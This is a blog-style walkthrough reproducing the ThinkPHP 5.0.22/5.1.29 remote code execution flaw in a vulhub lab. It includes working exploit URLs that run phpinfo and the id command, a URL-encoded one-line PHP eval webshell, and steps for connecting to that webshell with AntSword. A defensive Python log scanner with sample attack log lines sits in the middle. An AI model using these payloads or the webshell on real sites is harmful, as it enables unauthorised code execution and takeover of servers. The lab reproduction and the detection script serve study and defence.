Thinkphp5 5.0.22/5.1.29 remote code execution vulnerability + webshell tool connection (detailed reproduction process)

Vulnerability introduction

ThinkPHP is a PHP development framework that is extremely widely used in China. Because the framework does not properly validate the controller name, a site that does not have forced routing enabled (it is disabled by default) allows any method to be called through the route, leading to an RCE vulnerability.

Affected versions: Thinkphp5 5.0.22/5.1.29

Vulnerability reproduction

1. Environment setup

An Ubuntu virtual machine is used here to build the target range from the vulhub vulnerability environment collection.

Enter the directory for this vulnerability in Vulhub: cd /vulhub/thinkphp/5-rce

Run docker-compose up -d to build and start the range container:

Open http://your-ip:8080 from a Windows 10 physical machine on the same LAN, and the default ThinkPHP page appears:


At this point the vulnerable environment is ready (Docker is so efficient).

2. Exploiting the vulnerability

Poc1

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

Append it directly after http://your-ip:8080, and the phpinfo page appears when the URL is accessed:

Poc2

//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

Append it directly after http://your-ip:8080, and the page echoes the output of the id command:

This is the point used for file upload; next, the webshell file is uploaded.

First, URL-encode the one-line PHP webshell (the "one-sentence Trojan"):

Encoding result: %3C%3Fphp%20%40eval(%24_POST%7B2333%7D)%20%3B%3F%3E

Splice this encoded code into the id position mentioned above, upload the file, and an echo appears on the web page:

This confirms that the webshell file was uploaded successfully.
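The requests in Poc1 and Poc2 leave a clear signature in web server access logs: the path-info parameter s= names a fully-qualified class (\think\app) instead of a plain module/controller/action route. The following detection script is an added example, not part of the original post; the log lines are constructed samples in combined-log layout (the field positions are an assumption about that layout), and it also catches the URL-encoded variant of the same route.

```python
"""Flag ThinkPHP 5 'invokefunction' RCE attempts in access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines in combined-log style; not real traffic.
SAMPLE_LOG = r'''
10.0.0.5 - - [20/Mar/2023:10:01:02 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Mar/2023:10:01:07 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1" 200 8192 "-" "curl/7.68.0"
10.0.0.9 - - [20/Mar/2023:10:01:11 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 128 "-" "python-requests/2.28"
10.0.0.7 - - [20/Mar/2023:10:02:00 +0000] "POST /index.php?s=/index/article/save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
'''

# Request line inside the quoted "METHOD target HTTP/x.y" field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')


def is_invokefunction_attempt(target: str) -> bool:
    """True when the ThinkPHP path-info route (s=) names a namespaced class.

    A legitimate route is module/controller/action made of plain identifiers.
    A backslash in any segment means the request is addressing a class by its
    full name (e.g. \\think\\app), which is exactly what the unpatched
    versions fail to reject; the invokefunction action is flagged as well.
    """
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for route in params.get('s', []):
        route = unquote(route)  # parse_qs decoded once; handle double encoding
        segments = [seg for seg in route.split('/') if seg]
        if any('\\' in seg for seg in segments):
            return True
        if any(seg.lower() == 'invokefunction' for seg in segments):
            return True
    return False


def scan_log(text: str) -> list:
    """Return (client_ip, request_target) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_invokefunction_attempt(m.group('target')):
            hits.append((line.split(' ', 1)[0], m.group('target')))
    return hits


if __name__ == '__main__':
    for ip, target in scan_log(SAMPLE_LOG):
        print(f'ALERT {ip} {target}')
```

Any hit is worth treating as an attempted RCE regardless of response code, and the permanent fix is upgrading past the affected versions or enabling forced routing so that such class names are never resolved.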

3. Webshell connection

Use AntSword (中国蚁剑, "China Ant Sword") to connect:

Enter the URL of the uploaded webshell and the password contained in the one-line webshell.

The connection succeeds, and the website's directory listing is visible:


Source: blog.csdn.net/m0_52701599/article/details/129646523